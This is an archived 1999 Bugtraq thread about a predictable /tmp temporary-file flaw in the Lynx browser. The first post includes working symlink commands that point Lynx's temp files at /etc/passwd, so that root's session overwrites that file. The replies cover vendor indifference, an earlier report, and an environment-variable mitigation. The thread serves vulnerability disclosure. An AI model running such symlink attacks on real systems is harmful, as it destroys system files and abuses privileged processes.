Date: Tue, 9 Feb 1999 20:57:30 -0500 From: Juan Diego Bolanos To: BUGTRAQ@netspace.org Subject: Lynx /tmp problem Hi Aleph, please filter this if already posted.... ------ Hello.... I have found a bug in Lynx all versions, except the latest stable release... lynx create temporary files in /tmp in this way.... L[num proc]-xTMP.html where [num proc] is the proc number in the machine x is a number from 0 to 9 if i run lynx like any user, for example root we see this earthworm:~$ ps PID TTY STAT TIME COMMAND 91 1 SW 0:06 (bash) 94 4 S 0:05 -bash 95 5 SW 0:06 (bash) 3867 a3 S 0:00 pppd -detach defaultroute crtscts modem 192.168.2.6: 3870 3 SW 0:02 (ssh) 3894 4 T 0:00 lynx 3898 4 R 0:00 ps then the files in /tmp created by lynx will be.. L3894-0TMP.html L3894-1TMP.html L3894-2TMP.html L3894-3TMP.html L3894-4TMP.html L3894-5TMP.html L3894-6TMP.html L3894-7TMP.html L3894-8TMP.html L3894-9TMP.html if i make a symlink >from all of this files to any file in the system, for example.... earthworm:~$ cd /tmp earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html and now root (in this example) try to download a file, or press the backspace key to reach the history list, the file i have linked (in this case /etc/passwd) will be replaced with it... and now is owned by root... for example i got this in my system... earthworm:/tmp$ cat /etc/passwd Lynx History Page

You have reached the History Page

Lynx Version 2.8rel2

You selected:
  0. Internet Firewalls Frequently Asked Questions
file://localhost/root/firefaq.html
like you see, the file is lost now... this bug is lynx specific, so all OS are vulnerables.. Fix, upgrade to the latest lynx version, i have checked it, and it appear to use a L[proc num]-xTMP.html where x is from 0 to ???... i hope it is already fixed, creating 100 symlinks are not to hard :) the lynx team know this yet. by... Juan Diego --------------------------------------------------------------------------- Date: Thu, 11 Feb 1999 12:55:41 -0700 From: Theo de Raadt To: BUGTRAQ@netspace.org Subject: Re: Lynx /tmp problem > this bug is lynx specific, so all OS are vulnerables.. OpenBSD ships with an integrated version of lynx. Our version has tweaks to avoid this issue. We've brought this issue up with the lynx people before. They do not appear to give a damn. That said, from reading the code I can see why they might not care -- this problem is going to be a complete nightmare to fix. Lynx's handling of /tmp is wrought with many races, and the code is pasta. --------------------------------------------------------------------------- Date: Fri, 12 Feb 1999 08:47:00 +0000 From: Glynn Clements To: BUGTRAQ@netspace.org Subject: Re: Lynx /tmp problem Juan Diego Bolanos wrote: > Hi Aleph, > please filter this if already posted.... The fact that lynx has potential /tmp problems was discussed last March: From: Michal Zalewski Subject: Another day, another race - lynx 2.7.1 Date: Tue, 17 Mar 1998 15:39:58 +0100 Message-ID: > I have found a bug in Lynx all versions, except the latest stable > release... > > lynx create temporary files in /tmp in this way.... [details of your average /tmp problem snipped]. >From the INSTALLATION file: The environment variable "LYNX_TEMP_SPACE", if set, will override the default path prefix for temporary files that was defined via the constant "TEMP_SPACE" in userdefs.h. See userdefs.h for more information. -- Glynn Clements